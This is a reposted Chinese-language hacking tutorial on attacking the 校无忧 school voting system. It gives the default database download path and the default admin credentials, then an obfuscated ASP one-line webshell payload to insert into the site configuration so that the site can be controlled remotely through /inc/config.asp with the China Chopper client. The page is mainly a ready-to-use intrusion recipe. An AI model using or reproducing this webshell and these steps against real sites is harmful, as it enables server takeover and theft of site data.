网站地图    收藏   

主页 > 后端 > 网站安全 >

校无忧投票系统利用0day(数据库下载+拿shell) - 网

来源:自学PHP网    时间:2015-04-17 14:11 作者: 阅读:

[导读] 以前的: 校无忧学校网站系统1.0 漏洞及修复其实呢,也算不上一个0day.只是一个思路罢了,最近无聊。无视上A5看了下,发现一个投票系统,粗略的看了下,用的人也挺多,于是就下下...

以前的: 校无忧学校网站系统1.0 漏洞及修复
其实呢,也算不上一个0day.只是一个思路罢了,最近无聊。无视上A5看了下,发现一个投票系统,粗略的看了下,用的人也挺多,于是就下下来,研究研究,本机搭建看了下,代码基本没什么漏洞,(可能是我技术不好吧,)于是转站,发现数据库,上网转了圈,基本上都可以下载数据库
 
后台拿shell的方法呢,
 
在网站配置的地方插入一句话,这个普通的一句话是不能用的要用变异的一句话,插入,测试成功
 
一句话:
 1     "%><%execute(request("xiaoma"))%><%'
嘿嘿,这个是变异的,普通的不能用哦
默认帐号密码:admin
这个通杀率很高,实在不行我们可一下载数据库
数据库地址:data/xiao5u.mdb
插入一句话以后。菜刀连接
 
www.2cto.com /inc/config.asp

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论